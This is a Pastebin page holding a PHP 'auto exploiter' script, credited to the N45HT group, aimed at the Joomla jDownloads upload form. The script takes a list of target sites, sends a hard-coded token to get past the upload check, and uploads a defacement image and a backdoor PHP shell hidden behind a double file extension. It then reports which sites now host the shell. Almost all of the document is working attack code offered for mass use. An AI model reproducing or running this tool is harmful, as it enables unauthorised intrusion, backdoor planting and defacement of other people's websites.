G2A Many GEOs
SHARE
TWEET

Mass Exploiter jDownloads

choirurrizal Dec 17th, 2017 (edited) 359 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. # ShinChan - N45HT - N45HT.WEB.ID
  4. # fb.com/angelia.put - fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  5. # shinchan0x1945@gmail.com
  6.  
  7. # your list.txt must a single directory with this exploiter #
  8.  
  9.  
  10. ##########################################################
  11. # Terimakasih kepada semua teman teman yang membantu membuat Exploiter ini
  12. # Exploiter ini mungkin tidak 100% work, soalnya bot njay
  13.  
  14. # Special thanks : PETR03X - Comod0x - Grav3 - FRU_403
  15.                    SCYTHE404_LOL - All Members N45HT
  16. ##########################################################
  17.  
  18. # note : jangan hapus copyright, hargai pembuat
  19.  
  20.  
  21.  
  22. # coded by ShinChan - N45HT | 15/12/2017
  23. */
  24. echo "
  25.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  26. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  27. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  28. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  29.        jDownloads Auto Exploiter - coded by ShinChan
  30.  
  31.  Thanks to :  PETR03X - Mr.x0x - SCYTHE404_LOL - ./Mr.Blank007
  32.                        All Members N45HT
  33.  
  34.  
  35. ";
  36. echo "Input your target list: ";
  37. $list = trim(fgets(STDIN));
  38.  
  39. $zip = "sh.zip"; //File WinRAR, ekstensi harus zip/rar
  40. $gif = "sh.gif"; //image(jpg,png,gif) atau script deface(html.j,htm.j)
  41. $shell = "sh.php.php.j"; //shell backdoor(.php.php.j)
  42. $shells = str_replace("php.j","j",$shell);
  43. $path = "/images/jdownloads/screenshots/";
  44. $exploit = "/?option=com_jdownloads&Itemid=1&view=upload";
  45.  
  46. $open = fopen("$list","r");
  47. $size = filesize("$list");
  48. $read = fread($open,$size);
  49. $lists = explode("\r\n",$read);
  50.  
  51. $postgif = array(
  52.     "name" => "ShinChan",
  53.     "mail" => "shinchan0x1945@gmail.com",
  54.     "catlist" => "1",
  55.     "file_upload" => "@$zip",
  56.     "filetitle" => "hacked by ShinChan",
  57.     "description" => "<p>hacked by ShinChan</p>",
  58.     "2d1a8f3bd0b5cf542e9312d74fc9766f" => 1,
  59.     "send"=>1,
  60.     "senden" => "Send file",
  61.     "description" => "<p>hacked by ShinChan</p>",
  62.     "option"=>"com_jdownloads",
  63.     "view"=>"upload",
  64.     "pic_upload" => "@$gif"
  65. );
  66. $postshell = array(
  67.     "name" => "ShinChan",
  68.     "mail" => "shinchan0x1945@gmail.com",
  69.     "catlist" => "1",
  70.     "file_upload" => "@$zip",
  71.     "filetitle" => "hacked by ShinChan",
  72.     "description" => "<p>hacked by ShinChan</p>",
  73.     "2d1a8f3bd0b5cf542e9312d74fc9766f" => 1,
  74.     "send"=>1,
  75.     "senden" => "Send file",
  76.     "description" => "<p>hacked by ShinChan</p>",
  77.     "option"=>"com_jdownloads",
  78.     "view"=>"upload",
  79.     "pic_upload" => "@$shell"
  80. );
  81.  
  82. echo "\n";
  83.  
  84. foreach($lists as $target){
  85.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  86.         $targets = "http://$target";
  87.     }else{
  88.         $targets = $target;
  89.     }
  90.    
  91.     echo "Target => $targets\n";
  92.     echo "  [*] Checking Path : ";
  93.    
  94.     $chj = curl_init("$targets$exploit");
  95.     curl_setopt($chj, CURLOPT_FOLLOWLOCATION, 1);
  96.     curl_setopt($chj, CURLOPT_RETURNTRANSFER, 1);
  97.     curl_exec($chj);
  98.     $httpcodej = curl_getinfo($chj, CURLINFO_HTTP_CODE);
  99.     curl_close($chj);
  100.    
  101.     $ckg = curl_init("$targets$path$gif");
  102.     curl_setopt($ckg, CURLOPT_FOLLOWLOCATION, 1);
  103.     curl_setopt($ckg, CURLOPT_RETURNTRANSFER, 1);
  104.     curl_exec($ckg);
  105.     $httpcodeg = curl_getinfo($ckg, CURLINFO_HTTP_CODE);
  106.     curl_close($ckg);
  107.    
  108.     $cks = curl_init("$targets$path$shells");
  109.     curl_setopt($cks, CURLOPT_FOLLOWLOCATION, 1);
  110.     curl_setopt($cks, CURLOPT_RETURNTRANSFER, 1);
  111.     curl_exec($cks);
  112.     $httpcodes = curl_getinfo($cks, CURLINFO_HTTP_CODE);
  113.     curl_close($cks);
  114.    
  115.     if($httpcodej == 200){
  116.         echo "200 OK\n";
  117.         echo "  [*] Bypass Token : 2d1a8f3bd0b5cf542e9312d74fc9766f\n";
  118.         echo "  [*] Uploading Image : ";
  119.         $ch = curl_init("$targets$exploit");
  120.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  121.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  122.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,3 );
  123.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  124.         curl_setopt($ch, CURLOPT_POST, 1);
  125.         curl_setopt($ch, CURLOPT_POSTFIELDS, $postgif);
  126.         $data = curl_exec($ch);
  127.         curl_close($ch);
  128.         if($httpcodeg == 200 OR preg_match('/The file was successfully transferred to the server!/',$data) OR preg_match("/color=\"green\">/",$data)){
  129.             echo "OK $targets$path$gif\n";
  130.             echo "  [*] Uploading Shell : ";
  131.             $chs = curl_init("$targets$exploit");
  132.             curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  133.             curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  134.             curl_setopt($chs, CURLOPT_CONNECTTIMEOUT,3 );
  135.             curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  136.             curl_setopt($chs, CURLOPT_POST, 1);
  137.             curl_setopt($chs, CURLOPT_POSTFIELDS, $postshell);
  138.             $datas = curl_exec($chs);
  139.             curl_close($chs);
  140.             if($httpcodeg == 200 OR preg_match('/The file was successfully transferred to the server!/',$datas) OR preg_match("/color=\"green\">/",$datas)){
  141.                 echo "OK $targets$path$shells\n\n";
  142.             }else{
  143.                 echo "Failed\n\n";
  144.             }
  145.         }else{
  146.             echo "Failed\n";
  147.             echo "  [*] Uploading Shell : ";
  148.             $chs = curl_init("$targets$exploit");
  149.             curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  150.             curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  151.             curl_setopt($chs, CURLOPT_CONNECTTIMEOUT,3 );
  152.             curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  153.             curl_setopt($chs, CURLOPT_POST, 1);
  154.             curl_setopt($chs, CURLOPT_POSTFIELDS, $postshell);
  155.             $datas = curl_exec($chs);
  156.             curl_close($chs);
  157.             if($httpcodes == 200 OR preg_match('/The file was successfully transferred to the server!/',$datas) OR preg_match("/color=\"green\">/",$datas)){
  158.                 echo "OK $targets$path$shells\n\n";
  159.             }else{
  160.                 echo "Failed\n\n";
  161.             }
  162.         }
  163.     }else{
  164.         echo "Not Vulnerable\n\n";
  165.     }
  166. }
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top